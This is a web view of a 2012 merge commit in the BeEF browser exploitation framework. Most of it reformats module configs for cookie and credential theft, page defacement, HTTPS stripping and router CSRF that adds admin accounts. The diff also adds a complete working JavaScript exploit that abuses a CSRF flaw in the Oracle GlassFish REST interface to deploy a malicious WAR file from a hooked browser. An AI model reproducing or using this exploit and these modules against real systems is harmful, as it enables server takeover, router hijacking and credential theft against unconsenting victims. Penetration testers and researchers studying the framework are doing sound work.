Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

daily update from repo

Browse Source 
Merge branch 'master' of github.com:beefproject/beef
This commit is contained in:
qswain2
2012-06-06 19:30:04 -04:00
parent 6063e6246d 6396f7aa5a
commit b02b96791a
32 changed files with 313 additions and 31 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
install-beef
View File

@@ -1,3 +1,4 @@
#!/bin/bash
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#

4
modules/browser/get_visited_domains/config.yaml
View File

@@ -22,5 +22,5 @@ beef:
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]
working: ["FF", "IE"]
not_working: ["O", "C", "S"]

4
modules/browser/hooked_domain/ajax_fingerprint/config.yaml
View File

@@ -17,11 +17,11 @@ beef:
module:
ajax_fingerprint:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
working: ["FF","S"]
working: ["FF", "S"]
not_working: ["C"]

2
modules/browser/hooked_domain/alert_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]

2
modules/browser/hooked_domain/deface_web_page/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Content (Deface)"
description: "Overwrite the page, title and shortcut icon on the hooked page."
authors: ["antisnatchor"]

2
modules/browser/hooked_domain/get_cookie/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_local_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_page_html/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_page_links/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]

2
modules/browser/hooked_domain/get_session_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]

2
modules/browser/hooked_domain/get_stored_credentials/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Stored Credentials"
description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]

2
modules/browser/hooked_domain/link_rewrite/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]

2
modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]

4
modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
View File

@@ -17,10 +17,10 @@ beef:
module:
mobilesafari_address_spoofing:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "iOS Address Bar Spoofing"
description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
authors: ["bcoles","xntrik","majorsecurity.net"]
authors: ["bcoles", "xntrik", "majorsecurity.net"]
target:
working:
S:

2
modules/browser/hooked_domain/prompt_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]

2
modules/browser/hooked_domain/replace_video/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]

2
modules/browser/hooked_domain/rickroll/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]

2
modules/browser/hooked_domain/site_redirect/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]

2
modules/browser/hooked_domain/site_redirect_iframe/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]

2
modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
module:
Dlink_dcs_series_csrf:
enable: true
category: ["Exploits","Camera"]
category: ["Exploits", "Camera"]
name: "Dlink DCS series CSRF"
description: "Attempts to change the password on a Dlink DCS series camera."
authors: ["bcoles"]

224
modules/exploits/glassfish_war_upload_xsrf/command.js Normal file
View File

@@ -0,0 +1,224 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
beef.execute(function() {
var restHost = '<%= @restHost %>';
var warName = '<%= @warName %>';
var warBase = '<%= @warBase %>';
var logUrl = restHost + '/management/domain/applications/application';
//BEGIN Daniel Guerrero binary Base64-library
/*
Copyright (c) 2011, Daniel Guerrero
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Daniel Guerrero nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/**
* Uses the new array typed in javascript to binary base64 encode/decode
* at the moment just decodes a binary base64 encoded
* into either an ArrayBuffer (decodeArrayBuffer)
* or into an Uint8Array (decode)
*
* References:
* https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer
* https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array
*/
var Base64Binary = {
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
/* will return a Uint8Array type */
decodeArrayBuffer: function(input) {
var bytes = Math.ceil( (3*input.length) / 4.0);
var ab = new ArrayBuffer(bytes);
this.decode(input, ab);
return ab;
},
decode: function(input, arrayBuffer) {
//get last chars to see if are valid
var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1));
var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1));
var bytes = Math.ceil( (3*input.length) / 4.0);
if (lkey1 == 64) bytes--; //padding chars, so skip
if (lkey2 == 64) bytes--; //padding chars, so skip
var uarray;
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var j = 0;
if (arrayBuffer)
uarray = new Uint8Array(arrayBuffer);
else
uarray = new Uint8Array(bytes);
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
for (i=0; i<bytes; i+=3) {
//get the 3 octects in 4 ascii chars
enc1 = this._keyStr.indexOf(input.charAt(j++));
enc2 = this._keyStr.indexOf(input.charAt(j++));
enc3 = this._keyStr.indexOf(input.charAt(j++));
enc4 = this._keyStr.indexOf(input.charAt(j++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
uarray[i] = chr1;
if (enc3 != 64) uarray[i+1] = chr2;
if (enc4 != 64) uarray[i+2] = chr3;
}
return uarray;
}
}
//END Daniel Guerrero binary Base64-library
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
}
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
function fileUpload(fileData, fileName) {
boundary = "HELLOWORLD270883142628617",
uri = logUrl,
xhr = new XMLHttpRequest();
var additionalFields = {
asyncreplication: "true",
availabilityenabled: "false",
contextroot: "",
createtables: "true",
dbvendorname: "",
deploymentplan: "",
description: "",
dropandcreatetables: "true",
enabled: "true",
force: "false",
generatermistubs: "false",
isredeploy: "false",
keepfailedstubs: "false",
keepreposdir: "false",
keepstate: "true",
lbenabled: "true",
libraries: "",
logReportedErrors: "true",
name: "",
precompilejsp: "false",
properties: "",
property: "",
retrieve: "",
target: "",
type: "",
uniquetablenames: "true",
verify: "false",
virtualservers: "",
__remove_empty_entries__: "true"
}
var fileFieldName = "id";
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
xhr.withCredentials = "true";
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.');
}
}
var body = "";
for (var i in additionalFields) {
if (additionalFields.hasOwnProperty(i)) {
body += addField(i, additionalFields[i], boundary);
}
}
body += addFileField(fileFieldName, fileData, fileName, boundary);
body += "--" + boundary + "--";
xhr.setRequestHeader('Content-length', body.length);
xhr.sendAsBinary(body);
return true;
}
function addField(name, value, boundary) {
var c = "--" + boundary + "\r\n"
c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
c += value + "\r\n";
return c;
}
function addFileField(name, value, filename, boundary) {
var c = "--" + boundary + "\r\n"
c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
c += "Content-Type: application/octet-stream\r\n\r\n";
for(var i = 0; i< value.length; i++){
c+=String.fromCharCode(value[i] & 0xff);
}
c += "\r\n";
return c;
}
function start() {
fileUpload(Base64Binary.decode(warBase),warName);
}
start();
});

25
modules/exploits/glassfish_war_upload_xsrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
glassfish_war_upload_xsrf:
enable: true
category: "Exploits"
name: "GlassFish WAR Upload XSRF"
description: "This module attempts to deploy a malicious war file on an Oracle GlassFish Server 3.1.1 (build 12). It makes advantage of a CSRF bug in the REST interface.<br />For more information refer to <a href='http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html'>http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html</a>."
authors: ["Bart Leppens"]
target:
working: ["FF", "S", "C"]

32
modules/exploits/glassfish_war_upload_xsrf/module.rb Normal file
View File

File diff suppressed because one or more lines are too long

2
modules/exploits/router/bt_home_hub_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
bt_home_hub_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "BT Home Hub CSRF"
description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
authors: ["bcoles"]

2
modules/exploits/router/comtrend_ct5367_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5367_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5367 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
authors: ["bcoles"]

2
modules/exploits/router/comtrend_ct5624_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
comtrend_ct5624_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Comtrend CT-5624 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
authors: ["bcoles"]

2
modules/exploits/router/dlink_dsl500t_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
dlink_dsl500t_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "D-Link DSL500T CSRF"
description: "Attempts to change the password on a D-Link DSL500T router."
authors: ["bcoles"]

2
modules/exploits/router/huawei_smartax_mt880/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
Huawei_smartax_mt880_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Huawei SmartAX MT880 CSRF"
description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router."
authors: ["bcoles"]

2
modules/exploits/router/linksys_befsr41_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
linksys_befsr41_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys BEFSR41 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
authors: ["Martin Barbella"]

2
modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g2_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G2 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
authors: ["Martin Barbella"]

2
modules/exploits/router/linksys_wrt54g_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
linksys_wrt54g_csrf:
enable: true
category: ["Exploits","Router"]
category: ["Exploits", "Router"]
name: "Linksys WRT54G CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
authors: ["Martin Barbella"]

2
modules/exploits/switch/netgear_gs108t_csrf/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
Netgear_gs108t_csrf:
enable: true
category: ["Exploits","Switch"]
category: ["Exploits", "Switch"]
name: "Netgear GS108T CSRF"
description: "Attempts to change the password on a Netgear GS108T managed switch."
authors: ["Bart Leppens"]